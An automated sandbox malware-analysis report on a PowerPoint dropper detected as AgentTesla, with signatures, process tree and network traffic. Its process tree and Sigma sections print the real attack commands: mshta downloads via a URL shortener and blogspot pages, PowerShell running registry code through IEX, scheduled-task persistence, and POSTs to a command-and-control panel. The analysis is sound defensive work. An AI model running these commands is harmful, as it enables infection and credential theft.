Loading ...

Play interactive tourEdit tour

Analysis Report BankSwiftCopyUSD95000.ppt

Overview

General Information

Sample Name:BankSwiftCopyUSD95000.ppt
Analysis ID:339086
MD5:7f0b415d0b7a76530b2f510a910811e5
SHA1:480594ad26c91dd9d719c80334285375540dc83e
SHA256:8d3e1d1a1775191a33980069f500e37f22bdcd0a1ad3544ab4a9d0a651fbd019
Tags:ppt

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Powershell execute code from registry
Sigma detected: Schedule script from internet via mshta
Yara detected AgentTesla
.NET source code contains very large array initializations
Connects to a URL shortener service
Connects to a pastebin service (likely for C&C)
Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • POWERPNT.EXE (PID: 1464 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding MD5: EBBBEF2CCA67822395E24D6E18A3BDF6)
  • cmd.exe (PID: 1276 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt' MD5: AD7B9C14083B52BC532FBA5948342B98)
    • POWERPNT.EXE (PID: 2476 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt' MD5: EBBBEF2CCA67822395E24D6E18A3BDF6)
      • PING.EXE (PID: 2776 cmdline: ping.exe MD5: 5FB30FE90736C7FC77DE637021B1CE7C)
      • mshta.exe (PID: 2756 cmdline: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 2816 cmdline: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
          • MSBuild.exe (PID: 2720 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 7FB523211C53D4AB3213874451A928AA)
        • schtasks.exe (PID: 3036 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\') MD5: 97E0EC3D6D99E8CC2B17EF2D3760E8FC)
        • cmd.exe (PID: 2340 cmdline: 'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • taskkill.exe (PID: 956 cmdline: taskkill /f /im winword.exe MD5: 3722FA501DCB50AE42818F9034906891)
          • taskkill.exe (PID: 1620 cmdline: taskkill /f /im EXCEL.exe MD5: 3722FA501DCB50AE42818F9034906891)
      • PING.EXE (PID: 2720 cmdline: ping.exe MD5: 5FB30FE90736C7FC77DE637021B1CE7C)
  • taskeng.exe (PID: 2168 cmdline: taskeng.exe {2ABF5983-E6CF-46DC-B95A-53E1F6F4D156} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • mshta.exe (PID: 2368 cmdline: C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close') MD5: 95828D670CFD3B16EE188168E083C3C5)
      • mshta.exe (PID: 600 cmdline: 'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 288 cmdline: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • mshta.exe (PID: 848 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).meather)|IEX'', 0 : window.close') MD5: 95828D670CFD3B16EE188168E083C3C5)
    • powershell.exe (PID: 2796 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)|IEX MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • mshta.exe (PID: 2468 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://backbones1234511a.blogspot.com/p/stback1.html'', 0 : window.close') MD5: 95828D670CFD3B16EE188168E083C3C5)
    • mshta.exe (PID: 2236 cmdline: 'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 1776 cmdline: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • mshta.exe (PID: 592 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://startthepartyup.blogspot.com/p/backbone14.html'', 0 : window.close') MD5: 95828D670CFD3B16EE188168E083C3C5)
    • mshta.exe (PID: 2224 cmdline: 'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html MD5: 95828D670CFD3B16EE188168E083C3C5)
  • mshta.exe (PID: 532 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://ghostbackbone123.blogspot.com/p/ghostbackup13.html'', 0 : window.close') MD5: 95828D670CFD3B16EE188168E083C3C5)
    • mshta.exe (PID: 2112 cmdline: 'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000C.00000002.2281127990.00000000048E4000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000021.00000002.2354098697.0000000004834000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000001D.00000002.2291584431.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000018.00000002.2370323670.0000000004854000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            29.2.MSBuild.exe.400000.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Powershell execute code from registryShow sources
              Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, CommandLine: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, CommandLine|base64offset|contains: z+, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2756, ProcessCommandLine: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, ProcessId: 2816
              Sigma detected: Schedule script from internet via mshtaShow sources
              Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\'), CommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\'), CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2756, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\'), ProcessId: 3036
              Sigma detected: MSHTA Spawning Windows ShellShow sources
              Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, CommandLine: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, CommandLine|base64offset|contains: z+, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2756, ProcessCommandLine: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, ProcessId: 2816
              Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
              Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, CommandLine: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt', ParentImage: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE, ParentProcessId: 2476, ProcessCommandLine: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, ProcessId: 2756

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus / Scanner detection for submitted sampleShow sources
              Source: BankSwiftCopyUSD95000.pptAvira: detected
              Multi AV Scanner detection for submitted fileShow sources
              Source: BankSwiftCopyUSD95000.pptVirustotal: Detection: 34%Perma Link
              Source: BankSwiftCopyUSD95000.pptReversingLabs: Detection: 21%
              Machine Learning detection for sampleShow sources
              Source: BankSwiftCopyUSD95000.pptJoe Sandbox ML: detected
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49174 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49183 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49184 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.22:49193 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49206 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49210 version: TLS 1.0
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49168 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49178 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49188 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49192 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49200 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49208 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49213 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49215 version: TLS 1.2
              Source: Binary string: Managament.inf.pdb source: powershell.exe, 0000000C.00000002.2287134514.0000000006951000.00000004.00000001.sdmp
              Source: Binary string: mscorrc.pdb source: powershell.exe, 0000000C.00000002.2254678756.0000000002B60000.00000002.00000001.sdmp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

              Software Vulnerabilities:

              barindex
              Document exploit detected (process start blacklist hit)Show sources
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\PING.EXE
              Source: powerpnt.exeMemory has grown: Private usage: 0MB later: 10MB
              Source: global trafficDNS query: name: j.mp
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 108.177.127.132:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 67.199.248.16:80

              Networking:

              barindex
              Connects to a URL shortener serviceShow sources
              Source: unknownDNS query: name: j.mp
              Connects to a pastebin service (likely for C&C)Show sources
              Source: unknownDNS query: name: paste.ee
              Source: unknownDNS query: name: paste.ee
              Source: unknownDNS query: name: paste.ee
              Source: unknownDNS query: name: paste.ee
              Source: unknownDNS query: name: paste.ee
              Source: unknownDNS query: name: paste.ee
              Uses ping.exe to check the status of other devices and networksShow sources
              Source: unknownProcess created: C:\Windows\System32\PING.EXE ping.exe
              Source: Joe Sandbox ViewIP Address: 172.67.219.133 172.67.219.133
              Source: Joe Sandbox ViewIP Address: 172.67.219.133 172.67.219.133
              Source: Joe Sandbox ViewIP Address: 67.199.248.16 67.199.248.16
              Source: Joe Sandbox ViewIP Address: 67.199.248.16 67.199.248.16
              Source: Joe Sandbox ViewASN Name: GOOGLE-PRIVATE-CLOUDUS GOOGLE-PRIVATE-CLOUDUS
              Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
              Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
              Source: global trafficHTTP traffic detected: GET /dbgghasdnasdjasgdakgsdhv HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: j.mpConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continueConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49174 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49183 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49184 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.22:49193 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49206 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49210 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
              Source: global trafficHTTP traffic detected: GET /dbgghasdnasdjasgdakgsdhv HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: j.mpConnection: Keep-Alive
              Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.comt\ equals www.linkedin.com (Linkedin)
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: Content-Security-Policy: script-src 'self' *.google.com *.google-analytics.com 'unsafe-inline' 'unsafe-eval' *.gstatic.com *.googlesyndication.com *.blogger.com *.googleapis.com uds.googleusercontent.com https://s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleusercontent.com www-blogger-opensocial.googleusercontent.com https://www.blogblog.com; report-uri /cspreport equals www.youtube.com (Youtube)
              Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
              Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: unknownDNS traffic detected: queries for: j.mp
              Source: unknownHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continueConnection: Keep-Alive
